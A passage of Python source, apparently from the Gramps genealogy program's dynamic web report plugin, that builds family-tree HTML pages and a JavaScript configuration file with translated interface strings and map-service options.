[\n\t\t\tself._data_child_ref(self.obj_dict[Person][child_ref.ref][OBJDICT_INDEX], child_ref)\n\t\t\tfor child_ref in family.get_child_ref_list()\n\t\t\tif (child_ref.ref in self.obj_dict[Person])\n\t\t]\n\t\treturn(\"[\" + \",\".join(links) + \"]\")\n\n\tdef _data_child_ref(self, index, child_ref):\n\t\t# Child reference in the form:\n\t\t# [index, relation to father, relation to mother, notes, list of citations]\n\t\ttxt = \"[\"\n\t\ttxt += str(index) + \",\"\n\t\ttxt += \"\\\"\" + script_escape(str(child_ref.get_father_relation())) + \"\\\",\"\n\t\ttxt += \"\\\"\" + script_escape(str(child_ref.get_mother_relation())) 
+ \"\\\",\"\n\t\t# Get child reference notes\n\t\ttxt += \"\\\"\" + script_escape(self.get_notes_text(child_ref)) + \"\\\",\"\n\t\t# Get child reference sources\n\t\ttxt += self._data_source_citation_index(child_ref)\n\t\ttxt += \"]\"\n\t\treturn(txt)\n\n\n\tdef _data_associations(self, person):\n\t\tassoclist = person.get_person_ref_list()\n\t\trels = []\n\t\tfor person_ref in assoclist:\n\t\t\ttxt = \"[\"\n\t\t\tif (person_ref.ref not in self.obj_dict[Person]): continue\n\t\t\ttxt += \"%i,\" % self.obj_dict[Person][person_ref.ref][OBJDICT_INDEX]\n\t\t\ttxt += \"\\\"\" + script_escape(str(person_ref.get_relation())) + \"\\\",\"\n\t\t\t# Get association notes\n\t\t\ttxt += \"\\\"\" + script_escape(self.get_notes_text(person_ref)) + \"\\\",\"\n\t\t\t# Get association sources\n\t\t\ttxt += self._data_source_citation_index(person_ref)\n\t\t\ttxt += \"]\"\n\t\t\trels.append(txt)\n\t\treturn(\"[\" + \",\".join(rels) + \"]\")\n\n\n\tdef get_birth_year(self, person):\n\t\tev = get_birth_or_fallback(self.database, person)\n\t\treturn(self._get_year_text(ev) or \"?\")\n\tdef get_death_year(self, person):\n\t\tev = get_death_or_fallback(self.database, person)\n\t\treturn(self._get_year_text(ev))\n\tdef get_marriage_year(self, family):\n\t\tev = get_marriage_or_fallback(self.database, family)\n\t\treturn(self._get_year_text(ev))\n\tdef _get_year_text(self, event):\n\t\ty = \"\"\n\t\tif (event):\n\t\t\ty = \"?\"\n\t\t\tdate = event.get_date_object()\n\t\t\tmod = date.get_modifier()\n\t\t\tstart = date.get_start_date()\n\t\t\tif (mod == Date.MOD_NONE and start != Date.EMPTY):\n\t\t\t\ty = str(start[2])\n\t\treturn(y)\n\n\tdef get_birth_place(self, person):\n\t\tev = get_birth_or_fallback(self.database, person)\n\t\treturn(self._get_place_text(ev))\n\tdef get_death_place(self, person):\n\t\tev = get_death_or_fallback(self.database, person)\n\t\treturn(self._get_place_text(ev))\n\tdef get_marriage_place(self, family):\n\t\tev = get_marriage_or_fallback(self.database, family)\n\t\treturn(self._get_place_text(ev))\n\tdef _get_place_text(self, event):\n\t\tplace_name = \"\"\n\t\tif (event):\n\t\t\tplace_handle = event.get_place_handle()\n\t\t\tif (place_handle and (place_handle in self.obj_dict[Place])):\n\t\t\t\tplace_name = report_utils.place_name(self.database, place_handle)\n\t\treturn(place_name)\n\n\tdef get_death_age(self, person):\n\t\tev_birth = get_birth_or_fallback(self.database, person)\n\t\tbirth_date = None\n\t\tif (ev_birth): birth_date = ev_birth.get_date_object()\n\t\tev_death = get_death_or_fallback(self.database, person)\n\t\tdeath_date = None\n\t\tif (ev_death): death_date = ev_death.get_date_object()\n\t\tif (birth_date):\n\t\t\talive = probably_alive(person, self.database, Today())\n\t\t\tif (not alive and death_date):\n\t\t\t\tnyears = death_date - birth_date\n\t\t\t\tnyears.format(precision = 3)\n\t\t\t\treturn(str(nyears))\n\t\treturn(\"\");\n\n\n\tdef _export_pages(self):\n\t\t\"\"\"\n\t\tGenerate the HTML pages\n\t\t\"\"\"\n\t\t\n\t\t# Check pages configuration (in the options)\n\t\tpcset = set(self.page_content)\n\t\tif (len(pcset) != len(self.page_content)):\n\t\t\tlog.error(_(\"The pages configuration is not valid: several pages have the same content\"))\n\t\t\treturn\n\t\t\t\n\t\t# Export the script containing the web pages configuration\n\t\tself._export_script_configuration()\n\t\t\n\t\t# List of the scripts and CSS stylesheets used in the HTML pages\n\t\t# Note: other scripts and stylesheets are dynamically loaded in \"dwr_start.js\"\n\t\t# \"dwr_start.js\" is loaded in all 
pages unconditionally (see L{write_header})\n\t\tdbscripts = [\"dwr_db_indi.js\", \"dwr_db_fam.js\", \"dwr_db_sour.js\", \"dwr_db_cita.js\", \"dwr_db_media.js\", \"dwr_db_place.js\", \"dwr_db_repo.js\", \"dwr_db_surns.js\"] #: list of the scripts to embed in the HTML\n\t\tmapscripts = [] #: list of the scripts to embed in the HTML pages that show a map\n\t\tmapstyles = [] #: list of the CSS stylesheets to embed in the HTML pages that show a map\n\t\tif (self.options['placemappages'] or self.options['familymappages']):\n\t\t\tif (self.options['mapservice'] == \"Google\"):\n\t\t\t\tmapscripts = [\"http://maps.googleapis.com/maps/api/js?sensor=false\"]\n\t\t\telse:\n\t\t\t\tmapscripts = [\"http://openlayers.org/en/v3.0.0/build/ol.js\"]\n\t\t\t\tmapstyles = [\"http://openlayers.org/en/v3.0.0/css/ol.css\"]\n\t\t\t\t# mapscripts = [\"ol.js\"]\n\t\t\t\t# mapstyles = [\"ol.css\"]\n\t\t\t\t# mapscripts = [\"http://cdn.leafletjs.com/leaflet-0.7.3/leaflet.js\"]\n\t\t\t\t# mapstyles = [\"http://cdn.leafletjs.com/leaflet-0.7.3/leaflet.css\"]\n\t\t\t\t\n\t\t#: List of pages to generate: index in L{PAGES_NAMES}, Javascript code for generating the page\n\t\tparts = {\n\t\t\tPAGE_PERSON: (dbscripts, \"DwrMain(PAGE_INDI);\"),\n\t\t\tPAGE_SURNAMES: (dbscripts, \"printSurnamesIndex();\"),\n\t\t\tPAGE_PERSON_INDEX: (dbscripts, \"printPersonsIndex();\"),\n\t\t\tPAGE_FAMILY_INDEX: (dbscripts, \"printFamiliesIndex();\"),\n\t\t\tPAGE_SOURCE_INDEX: (dbscripts, \"printSourcesIndex();\"),\n\t\t\tPAGE_MEDIA_INDEX: (dbscripts, \"printMediaIndex();\"),\n\t\t\tPAGE_PLACE_INDEX: (dbscripts, \"printPlacesIndex();\"),\n\t\t\tPAGE_ADDRESS_INDEX: (dbscripts, \"printAddressesIndex();\"),\n\t\t\tPAGE_REPOSITORY_INDEX: (dbscripts, \"printReposIndex();\"),\n\t\t\tPAGE_SVG_TREE: (dbscripts, \"DwrMain(PAGE_SVG_TREE);\"),\n\t\t}\n\t\t\n\t\t# Export the HTML pages listed in L{PAGES_NAMES}\n\t\tfor i in range(self.pages_number):\n\t\t\tpc = self.page_content[i] # Get the page i contents defined in the options\n\t\t\tfilename = PAGES_NAMES[pc][2]\n\t\t\ttitle = self.page_name[pc]\n\t\t\tif (pc in parts):\n\t\t\t\t# The page is not a custom page\n\t\t\t\t(scripts, cmd) = parts[pc]\n\t\t\t\tself._export_html_page(filename, title, cmd, True, scripts)\n\t\t\telse:\n\t\t\t\t# The page is a custom page\n\t\t\t\ti_cst = pc - PAGE_CUSTOM\n\t\t\t\tself._export_custom_page(filename, title, self.custom_menu[i_cst], self.custom_note[i_cst])\n\n\t\t# The person page is required\n\t\tif (PAGE_PERSON not in self.page_content):\n\t\t\tself._export_html_page(\"person.html\", self.page_name[PAGE_PERSON], \"DwrMain(PAGE_INDI);\", True, dbscripts)\n\n\t\t# The search results page is required\n\t\tself._export_html_page(\"search.html\", _(\"Search results\"), \"DwrMain(PAGE_SEARCH);\", True, dbscripts)\n\n\t\t# Page for printing a family (if needed)\n\t\tif (self.inc_families):\n\t\t\tself._export_html_page(\"family.html\", self.page_name[PAGE_FAMILY_INDEX], \"DwrMain(PAGE_FAM);\", True, dbscripts + mapscripts , mapstyles)\n\t\t\n\t\t# Generate the surnames pages (if surnames page is used)\n\t\tif (PAGE_SURNAMES in self.page_content):\n\t\t\t# Page for persons with a given surname\n\t\t\tself._export_html_page(\"surname.html\", self.page_name[PAGE_SURNAMES], \"printSurnameIndex();\", True, dbscripts)\n\t\t\t# Page for surnames sorted by quantity\n\t\t\tself._export_html_page(\"surnames2.html\", self.page_name[PAGE_SURNAMES], \"printSurnamesIndex2();\", True, dbscripts)\n\n\t\t# Page for a single source (if needed)\n\t\tif (self.inc_sources):\n\t\t\tself._export_html_page(\"source.html\", self.page_name[PAGE_SOURCE_INDEX], \"DwrMain(PAGE_SOURCE);\", True, dbscripts)\n\n\t\t# Page for a single media (if needed)\n\t\tif (self.inc_gallery):\n\t\t\tself._export_html_page(\"media.html\", self.page_name[PAGE_MEDIA_INDEX], \"DwrMain(PAGE_MEDIA);\", True, dbscripts)\n\n\t\t# Page for a single place (if needed)\n\t\tif (self.inc_places):\n\t\t\tself._export_html_page(\"place.html\", self.page_name[PAGE_PLACE_INDEX], \"DwrMain(PAGE_PLACE);\", True, dbscripts + mapscripts , mapstyles)\n\n\t\t# Page for a single repository (if needed)\n\t\tif (self.inc_repositories):\n\t\t\tself._export_html_page(\"repository.html\", self.page_name[PAGE_REPOSITORY_INDEX], \"DwrMain(PAGE_REPO);\", True, dbscripts)\n\n\t\t# Page for full-screen SVG graph (if SVG graph is used)\n\t\tif (PAGE_SVG_TREE in self.page_content):\n\t\t\tself._export_html_page(\"tree_svg_full.html\", self.page_name[PAGE_SVG_TREE], \"DwrMain(PAGE_SVG_TREE_FULL);\", False, dbscripts)\n\t\t\tself._export_html_page(\"tree_svg_conf.html\", self.page_name[PAGE_SVG_TREE], \"DwrMain(PAGE_SVG_TREE_CONF);\", True, dbscripts)\n\t\t\tself._export_html_page(\"tree_svg_save.html\", self.page_name[PAGE_SVG_TREE], \"DwrMain(PAGE_SVG_TREE_SAVE);\", True, dbscripts)\n\n\n\tdef _export_script_configuration(self):\n\t\t\"\"\"\n\t\tGenerate \"dwr_conf.js\", which contains:\n\t\t - The pages configuration (mostly an extract of the report options),\n\t\t - The localization (translated strings)\n\t\t - Gramps constants that could be used in the Javascript\n\t\t\"\"\"\n\t\tsw = StringIO()\n\t\tsw.write(\"// This file is generated\\n\\n\")\n\t\tsw.write(\"NB_GENERATIONS_MAX = %i;\\n\" % int(self.options[\"graphgens\"]))\n\t\tsw.write(\"PAGES_TITLE = [\")\n\t\tsw.write(\", \".join([\n\t\t\t(\"\\\"\" + script_escape(self.page_name[self.page_content[i]]).replace(\" \", \"&nbsp;\") + \"\\\"\")\n\t\t\tfor i in range(self.pages_number)]))\n\t\tsw.write(\"];\\n\")\n\t\tsw.write(\"PAGES_FILE = [\")\n\t\tsw.write(\", \".join([\n\t\t\t(\"\\\"\" + script_escape(PAGES_NAMES[self.page_content[i]][2]) + \"\\\"\")\n\t\t\tfor i in range(self.pages_number)]))\n\t\tsw.write(\"];\\n\")\n\t\tsw.write(\"SVG_TREE_TYPES_NAMES = [\")\n\t\tsw.write(\", \".join([(\"\\\"\" + script_escape(n) + \"\\\"\") for n in SVG_TREE_TYPES]))\n\t\tsw.write(\"];\\n\")\n\t\tsw.write(\"SVG_TREE_SHAPES_NAMES = [\")\n\t\tsw.write(\", \".join([(\"\\\"\" + script_escape(n) + \"\\\"\") for n in SVG_TREE_SHAPES]))\n\t\tsw.write(\"];\\n\")\n\t\tsw.write(\"SVG_TREE_DISTRIB_ASC_NAMES = [\")\n\t\tsw.write(\", \".join([(\"\\\"\" + script_escape(n) + \"\\\"\") for n in SVG_TREE_DISTRIB_ASC]))\n\t\tsw.write(\"];\\n\")\n\t\tsw.write(\"SVG_TREE_DISTRIB_DSC_NAMES = [\")\n\t\tsw.write(\", \".join([(\"\\\"\" + script_escape(n) + \"\\\"\") for n in SVG_TREE_DISTRIB_DSC]))\n\t\tsw.write(\"];\\n\")\n\t\tsw.write(\"SVG_TREE_BACKGROUND_NAMES = [\")\n\t\tsw.write(\", \".join([(\"\\\"\" + script_escape(n) + \"\\\"\") for n in SVG_TREE_BACKGROUNDS]))\n\t\tsw.write(\"];\\n\")\n\t\tsw.write(\"SVG_TREE_TYPE = %s;\\n\" % self.options['svg_tree_type'])\n\t\tsw.write(\"SVG_TREE_SHAPE = %s;\\n\" % self.options['svg_tree_shape'])\n\t\tsw.write(\"SVG_TREE_DISTRIB_ASC = %s;\\n\" % self.options['svg_tree_distrib_asc'])\n\t\tsw.write(\"SVG_TREE_DISTRIB_DSC = %s;\\n\" % self.options['svg_tree_distrib_dsc'])\n\t\tsw.write(\"SVG_TREE_BACKGROUND = %s;\\n\" % self.options['svg_tree_background'])\n\t\tsw.write(\"SVG_TREE_COLOR1 = \\\"%s\\\";\\n\" % 
self.options['svg_tree_color1'])\n\t\tsw.write(\"SVG_TREE_COLOR2 = \\\"%s\\\";\\n\" % self.options['svg_tree_color2'])\n\t\tsw.write(\"SVG_TREE_SHOW_DUP = \" + (\"true\" if (self.options['svg_tree_dup']) else \"false\") + \";\\n\")\n\t\tsw.write(\"SVG_TREE_COLOR_DUP = \\\"%s\\\";\\n\" % self.options['svg_tree_color_dup'])\n\t\tsw.write(\"GRAMPS_PREFERENCES = [];\\n\")\n\t\tfor pref in [\n\t\t\t'bordercolor-gender-female-alive',\n\t\t\t'bordercolor-gender-female-death',\n\t\t\t'bordercolor-gender-male-alive',\n\t\t\t'bordercolor-gender-male-death',\n\t\t\t'bordercolor-gender-unknown-alive',\n\t\t\t'bordercolor-gender-unknown-death',\n\t\t\t'color-gender-female-alive',\n\t\t\t'color-gender-female-death',\n\t\t\t'color-gender-male-alive',\n\t\t\t'color-gender-male-death',\n\t\t\t'color-gender-unknown-alive',\n\t\t\t'color-gender-unknown-death',\n\t\t\t]:\n\t\t\tsw.write(\"GRAMPS_PREFERENCES['%s'] = \\\"%s\\\";\\n\" % (pref, config.get('preferences.%s' % pref)))\n\t\tsw.write(\"SVG_TREE_COLOR_SCHEME0 = [\" + \", \".join(\n\t\t\t[(\"\\\"#%02x%02x%02x\\\"\" % (r, g, b)) for (r, g, b) in GENCOLOR[BACKGROUND_WHITE]])\n\t\t\t+ \"];\\n\")\n\t\tsw.write(\"SVG_TREE_COLOR_SCHEME1 = [\" + \", \".join(\n\t\t\t[(\"\\\"#%02x%02x%02x\\\"\" % (r, g, b)) for (r, g, b) in GENCOLOR[BACKGROUND_SCHEME1]])\n\t\t\t+ \"];\\n\")\n\t\tsw.write(\"SVG_TREE_COLOR_SCHEME2 = [\" + \", \".join(\n\t\t\t[(\"\\\"#%02x%02x%02x\\\"\" % (r, g, b)) for (r, g, b) in GENCOLOR[BACKGROUND_SCHEME2]])\n\t\t\t+ \"];\\n\")\n\t\tsw.write(\"FOOTER=\\\"\" + script_escape(self.get_header_footer_notes(\"footernote\")) + \"\\\";\\n\")\n\t\tsw.write(\"HEADER=\\\"\" + script_escape(self.get_header_footer_notes(\"headernote\")) + \"\\\";\\n\")\n\t\tsw.write(\"COPYRIGHT=\\\"\" + script_escape(self.get_copyright_license()) + \"\\\";\\n\")\n\t\tsw.write(\"INDEX_SHOW_BIRTH=\" + (\"true\" if (self.options['showbirth']) else \"false\") + \";\\n\")\n\t\tsw.write(\"INDEX_SHOW_DEATH=\" + (\"true\" if (self.options['showdeath']) else \"false\") + \";\\n\")\n\t\tsw.write(\"INDEX_SHOW_MARRIAGE=\" + (\"true\" if (self.options['showmarriage']) else \"false\") + \";\\n\")\n\t\tsw.write(\"INDEX_SHOW_PARTNER=\" + (\"true\" if (self.options['showpartner']) else \"false\") + \";\\n\")\n\t\tsw.write(\"INDEX_SHOW_PARENTS=\" + (\"true\" if (self.options['showparents']) else \"false\") + \";\\n\")\n\t\tsw.write(\"INDEX_SHOW_ALL_SIBLINGS=\" + (\"true\" if (self.options['showallsiblings']) else \"false\") + \";\\n\")\n\t\tsw.write(\"INDEX_SHOW_BKREF_TYPE=\" + (\"true\" if (self.options['bkref_type']) else \"false\") + \";\\n\")\n\t\tsw.write(\"SORT_CHILDREN=\" + (\"true\" if (self.options['birthorder']) else \"false\") + \";\\n\")\n\t\tsw.write(\"INC_EVENTS=\" + (\"true\" if (self.inc_events) else \"false\") + \";\\n\")\n\t\tsw.write(\"INC_FAMILIES=\" + (\"true\" if (self.inc_families) else \"false\") + \";\\n\")\n\t\tsw.write(\"INC_SOURCES=\" + (\"true\" if (self.inc_sources) else \"false\") + \";\\n\")\n\t\tsw.write(\"INC_MEDIA=\" + (\"true\" if (self.inc_gallery) else \"false\") + \";\\n\")\n\t\tsw.write(\"INC_PLACES=\" + (\"true\" if (self.inc_places) else \"false\") + \";\\n\")\n\t\tsw.write(\"INC_REPOSITORIES=\" + (\"true\" if (self.inc_repositories) else \"false\") + \";\\n\")\n\t\tsw.write(\"INC_NOTES=\" + (\"true\" if (self.inc_notes) else \"false\") + \";\\n\")\n\t\tsw.write(\"INC_ADDRESSES=\" + (\"true\" if (self.inc_addresses) else \"false\") + \";\\n\")\n\t\tsw.write(\"MAP_PLACE=\" + (\"true\" if (self.options['placemappages']) else \"false\") + 
\";\\n\")\n\t\tsw.write(\"MAP_FAMILY=\" + (\"true\" if (self.options['familymappages']) else \"false\") + \";\\n\")\n\t\tsw.write(\"MAP_SERVICE=\\\"\" + script_escape(self.options['mapservice']) + \"\\\";\\n\")\n\t\tsw.write(\"__ = {\")\n\t\tsep = \"\\n\"\n\t\tfor (s, translated) in (\n\t\t\t(\"(filtered from _MAX_ total entries)\", _(\"(filtered from _MAX_ total entries)\")),\n\t\t\t(\"(sort by name)\", _(\"(sort by name)\")),\n\t\t\t(\"(sort by quantity)\", _(\"(sort by quantity)\")),\n\t\t\t(\": activate to sort column ascending\", _(\": activate to sort column ascending\")),\n\t\t\t(\": activate to sort column descending\", _(\": activate to sort column descending\")),\n\t\t\t(\"

    Click on a person to center the graph on this person.
    When clicking on the center person, the person page is shown.

    The type of graph can be selected in the list (on the top left side of the graph).

    The number of ascending and descending generations can also be adjusted.

    Use the mouse wheel or the buttons to zoom in and out.

    The graph can also be shown full-screen.\", _(\"

    Click on a person to center the graph on this person.
    When clicking on the center person, the person page is shown.

    The type of graph can be selected in the list (on the top left side of the graph).

    The number of ascending and descending generations can also be adjusted.

    Use the mouse wheel or the buttons to zoom in and out.

    The graph can also be shown full-screen.\")),\n\t\t\t(\"

    This page provides the SVG raw code.
    Copy the contents into a text editor and save as an SVG file.
    Make sure that the text editor encoding is UTF-8.

    \", _(\"

    This page provides the SVG raw code.
    Copy the contents into a text editor and save as an SVG file.
    Make sure that the text editor encoding is UTF-8.

    \")),\n\t\t\t(\"Address\", _(\"Address\")),\n\t\t\t(\"Addresses\", _(\"Addresses\")),\n\t\t\t(\"Age at Death\", _(\"Age at Death\")),\n\t\t\t(\"Alternate Name\", _(\"Alternate Name\")),\n\t\t\t(\"Ancestors\", _(\"Ancestors\")),\n\t\t\t(\"Associations\", _(\"Associations\")),\n\t\t\t(\"Attribute\", _(\"Attribute\")),\n\t\t\t(\"Attributes\", _(\"Attributes\")),\n\t\t\t(\"Background\", _(\"Background\")),\n\t\t\t(\"Call Name\", _(\"Call Name\")),\n\t\t\t(\"Call Number\", _(\"Call Number\")),\n\t\t\t(\"Children\", _(\"Children\")),\n\t\t\t(\"Church Parish\", _(\"Church Parish\")),\n\t\t\t(\"Citation\", _(\"Citation\")),\n\t\t\t(\"Citations\", _(\"Citations\")),\n\t\t\t(\"City\", _(\"City\")),\n\t\t\t(\"Click on the map to show it full-screen\", _(\"Click on the map to show it full-screen\")),\n\t\t\t(\"Configuration\", _(\"Configuration\")),\n\t\t\t(\"Country\", _(\"Country\")),\n\t\t\t(\"County\", _(\"County\")),\n\t\t\t(\"Date\", _(\"Date\")),\n\t\t\t(\"Descendants\", _(\"Descendants\")),\n\t\t\t(\"Description\", _(\"Description\")),\n\t\t\t(\"Event\", _(\"Event\")),\n\t\t\t(\"Events\", _(\"Events\")),\n\t\t\t(\"Expand\", _(\"Expand\")),\n\t\t\t(\"Families Index\", _(\"Families Index\")),\n\t\t\t(\"Family Nick Name\", _(\"Family Nick Name\")),\n\t\t\t(\"Father\", _(\"Father\")),\n\t\t\t(\"Female\", _(\"Female\")),\n\t\t\t(\"File ready\", _(\"File ready\")),\n\t\t\t(\"Gender\", _(\"Gender\")),\n\t\t\t(\"Graph help\", _(\"Graph help\")),\n\t\t\t(\"Latitude\", _(\"Latitude\")),\n\t\t\t(\"Link\", _(\"Link\")),\n\t\t\t(\"Loading...\", _(\"Loading...\")),\n\t\t\t(\"Locality\", _(\"Locality\")),\n\t\t\t(\"Location\", _(\"Location\")),\n\t\t\t(\"Longitude\", _(\"Longitude\")),\n\t\t\t(\"Male\", _(\"Male\")),\n\t\t\t(\"Map\", _(\"Map\")),\n\t\t\t(\"Maximize\", _(\"Maximize\")),\n\t\t\t(\"Media found:\", _(\"Media found:\")),\n\t\t\t(\"Media Index\", _(\"Media Index\")),\n\t\t\t(\"Media Type\", _(\"Media Type\")),\n\t\t\t(\"Media\", _(\"Media\")),\n\t\t\t(\"Mother\", _(\"Mother\")),\n\t\t\t(\"Name\", _(\"Name\")),\n\t\t\t(\"Nick Name\", _(\"Nick Name\")),\n\t\t\t(\"No data available in table\", _(\"No data available in table\")),\n\t\t\t(\"No matching records found\", _(\"No matching records found\")),\n\t\t\t(\"No matching surname.\", _(\"No matching surname.\")),\n\t\t\t(\"None.\", _(\"None.\")),\n\t\t\t(\"Notes\", _(\"Notes\")),\n\t\t\t(\"OK\", _(\"OK\")),\n\t\t\t(\"Parents\", _(\"Parents\")),\n\t\t\t(\"Path\", _(\"Path\")),\n\t\t\t(\"Person page\", _(\"Person page\")),\n\t\t\t(\"Person to search for\", _(\"Person to search for\")),\n\t\t\t(\"Person\", _(\"Person\")),\n\t\t\t(\"Persons found:\", _(\"Persons found:\")),\n\t\t\t(\"Persons Index\", _(\"Persons Index\")),\n\t\t\t(\"Phone\", _(\"Phone\")),\n\t\t\t(\"Place\", _(\"Place\")),\n\t\t\t(\"Places found:\", _(\"Places found:\")),\n\t\t\t(\"Places Index\", _(\"Places Index\")),\n\t\t\t(\"Postal Code\", _(\"Postal Code\")),\n\t\t\t(\"Preparing file ...\", _(\"Preparing file ...\")),\n\t\t\t(\"Processing...\", _(\"Processing...\")),\n\t\t\t(\"References\", _(\"References\")),\n\t\t\t(\"Relationship to Father\", _(\"Relationship to Father\")),\n\t\t\t(\"Relationship to Mother\", _(\"Relationship to Mother\")),\n\t\t\t(\"Relationship\", _(\"Relationship\")),\n\t\t\t(\"Repositories\", _(\"Repositories\")),\n\t\t\t(\"Repository\", _(\"Repository\")),\n\t\t\t(\"Restore\", _(\"Restore\")),\n\t\t\t(\"Save tree as file\", _(\"Save tree as file\")),\n\t\t\t(\"Search:\", _(\"Search:\")),\n\t\t\t(\"Select the background color scheme\", _(\"Select the 
background color scheme\")),\n\t\t\t(\"Select the children distribution (fan charts only)\", _(\"Select the children distribution (fan charts only)\")),\n\t\t\t(\"Select the number of ascending generations\", _(\"Select the number of ascending generations\")),\n\t\t\t(\"Select the number of descending generations\", _(\"Select the number of descending generations\")),\n\t\t\t(\"Select the parents distribution (fan charts only)\", _(\"Select the parents distribution (fan charts only)\")),\n\t\t\t(\"Select the shape of graph\", _(\"Select the shape of graph\")),\n\t\t\t(\"Select the type of graph\", _(\"Select the type of graph\")),\n\t\t\t(\"Several matches.
    Refine your search or choose from the lists below.\", _(\"Several matches.
    Refine your search or choose from the lists below.\")),\n\t\t\t(\"Show _MENU_ entries\", _(\"Show _MENU_ entries\")),\n\t\t\t(\"Showing 0 to 0 of 0 entries\", _(\"Showing 0 to 0 of 0 entries\")),\n\t\t\t(\"Showing _START_ to _END_ of _TOTAL_ entries\", _(\"Showing _START_ to _END_ of _TOTAL_ entries\")),\n\t\t\t(\"Siblings\", _(\"Siblings\")),\n\t\t\t(\"Source\", _(\"Source\")),\n\t\t\t(\"Sources found:\", _(\"Sources found:\")),\n\t\t\t(\"Sources Index\", _(\"Sources Index\")),\n\t\t\t(\"Sources\", _(\"Sources\")),\n\t\t\t(\"Spouses\", _(\"Spouses\")),\n\t\t\t(\"State/ Province\", _(\"State/ Province\")),\n\t\t\t(\"Street\", _(\"Street\")),\n\t\t\t(\"Surnames Index\", _(\"Surnames Index\")),\n\t\t\t(\"SVG tree children distribution\", _(\"SVG tree children distribution\")),\n\t\t\t(\"SVG tree graph shape\", _(\"SVG tree graph shape\")),\n\t\t\t(\"SVG tree graph type\", _(\"SVG tree graph type\")),\n\t\t\t(\"SVG tree parents distribution\", _(\"SVG tree parents distribution\")),\n\t\t\t(\"There is no matching name.\", _(\"There is no matching name.\")),\n\t\t\t(\"Title\", _(\"Title\")),\n\t\t\t(\"Type\", _(\"Type\")),\n\t\t\t(\"Unknown\", _(\"Unknown\")),\n\t\t\t(\"Use the search box above in order to find a person.
    Women are listed with their maiden name.\", _(\"Use the search box above in order to find a person.
    Women are listed with their maiden name.\")),\n\t\t\t(\"Used for family\", _(\"Used for family\")),\n\t\t\t(\"Used for media\", _(\"Used for media\")),\n\t\t\t(\"Used for person\", _(\"Used for person\")),\n\t\t\t(\"Used for place\", _(\"Used for place\")),\n\t\t\t(\"Used for source\", _(\"Used for source\")),\n\t\t\t(\"Value\", _(\"Value\")),\n\t\t\t(\"Web Link\", _(\"Web Link\")),\n\t\t\t(\"Web Links\", _(\"Web Links\")),\n\t\t\t(\"Without surname\", _(\"Without surname\")),\n\t\t\t(\"Zoom in\", _(\"Zoom in\")),\n\t\t\t(\"Zoom out\", _(\"Zoom out\")),\n\t\t\t):\n\t\t\tsw.write(sep + \"\\\"\" + script_escape(s) + \"\\\": \\\"\" + script_escape(translated) + \"\\\"\")\n\t\t\tsep = \",\\n\"\n\t\tfor (code, translated, s) in EventType._DATAMAP:\n\t\t\tsw.write(sep + \"\\\"\" + script_escape(s) + \"\\\": \\\"\" + script_escape(translated) + \"\\\"\")\n\t\t\tsep = \",\\n\"\n\t\tsw.write(\"\\n};\\n\")\n\t\tsw.write(\n\t\t\t(\"URLTYPE_UNKNOWN = %i;\\n\" % UrlType.UNKNOWN) +\n\t\t\t(\"URLTYPE_CUSTOM = %i;\\n\" % UrlType.CUSTOM) +\n\t\t\t(\"URLTYPE_EMAIL = %i;\\n\" % UrlType.EMAIL) +\n\t\t\t(\"URLTYPE_WEB_HOME = %i;\\n\" % UrlType.WEB_HOME) +\n\t\t\t(\"URLTYPE_WEB_SEARCH = %i;\\n\" % UrlType.WEB_SEARCH) +\n\t\t\t(\"URLTYPE_WEB_FTP = %i;\\n\" % UrlType.WEB_FTP))\n\t\tself.update_file(\"dwr_conf.js\", sw.getvalue(), \"UTF-8\")\n\n\n\tdef _export_html_page(self, filename, title, cmd, menu, scripts = [], styles = []):\n\t\t\"\"\"\n\t\tGenerate an HTML page\n\t\t@param filename: output HTML file name\n\t\t@param title: Title of the page (prepended to L{self.title}\n\t\t@param cmd: Javascript code that generates the page\n\t\t@param menu: Whether to put a menu on the page\n\t\t@param scripts: Scripts embedded in the page\n\t\t@param styles: CSS stylesheets embedded in the page\n\t\t\"\"\"\n\t\t(page, head, body) = self.write_header(title, menu)\n\t\tfor style in styles:\n\t\t\thead += Html(\"link\", rel = \"stylesheet\", href = style, type = \"text/css\")\n\t\tfor script in scripts:\n\t\t\thead += Html(\"script\", language = \"javascript\", src = script, charset = self.encoding)\n\t\tbody += Html(\"script\", cmd, language = \"javascript\")\n\t\tself.update_file(filename, html_text(page))\n\n\n\tdef _export_custom_page(self, filename, title, menu, note):\n\t\t\"\"\"\n\t\tGenerate an HTML custom page\n\t\t@param filename: output HTML file name\n\t\t@param title: Title of the page (prepended to L{self.title}\n\t\t@param menu: Whether to put a menu on the page\n\t\t@param note: note that contains the page contents\n\t\t\"\"\"\n\t\t(page, head, body) = self.write_header(title, menu)\n\t\tif (note):\n\t\t\thtml = self.get_note_format(self.database.get_note_from_gramps_id(note))\n\t\t\tbody += self.replace_note_fields(html)\n\t\tself.update_file(filename, html_text(page))\n\n\n\tdef write_header(self, title, menu):\n\t\t\"\"\"\n\t\tGenerate an HTML page header\n\t\t@param title: Title of the page (prepended to L{self.title}\n\t\t@param menu: Whether to put a menu on the page\n\t\t@return: List of L{Html} objects as follows: (page, head, body)\n\t\t\"\"\"\n\t\t\"\"\"\n\t\tNote. 
'title' is used as the current section in the navigation links and\n\t\tas part of the header title.\n\t\t\"\"\"\n\t\t# Begin each html page...\n\t\txmllang = xml_lang()\n\t\t(page, head, body) = Html.page('%s - %s' % (\n\t\t\t\thtml_escape(title),\n\t\t\t\thtml_escape(self.title.strip()),\n\t\t\t),\n\t\t\tself.encoding, xmllang)\n\t\t# Header constants\n\t\thead += Html(\"meta\", attr = 'name=\"viewport\" content=\"width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1\"')\n\t\thead += Html(\"meta\", attr = 'name=\"apple-mobile-web-app-capable\" content=\"yes\"')\n\t\thead += Html(\"meta\", attr = 'name=\"generator\" content=\"%s %s %s\"' % (PROGRAM_NAME, VERSION, URL_HOMEPAGE))\n\t\thead += Html(\"meta\", attr = 'name=\"author\" content=\"%s\"' % self.author)\n\t\t# Create script and favicon links\n\t\thead += Html(\"link\", type = \"image/x-icon\", href = \"data/favicon.ico\", rel = \"shortcut icon\")\n\t\thead += Html(\"script\", language = 'javascript', src = 'data/dwr_start.js')\n\t\t# Disable menu\n\t\tif (not menu):\n\t\t\tbody.attr = \"class='dwr-menuless'\"\n\t\treturn(page, head, body)\n\n\n\tdef get_header_footer_notes(self, item):\n\t\t\"\"\"\n\t\tReturn the header/footer note converted to an HTML string\n\t\t@param item: Option giving the note. See options \"footernote\" and \"headernote\"\n\t\t@return: text of the note\n\t\t@rtype: L{String}\n\t\t\"\"\"\n\t\tnote = self.options[item]\n\t\tif (note):\n\t\t\thtml = 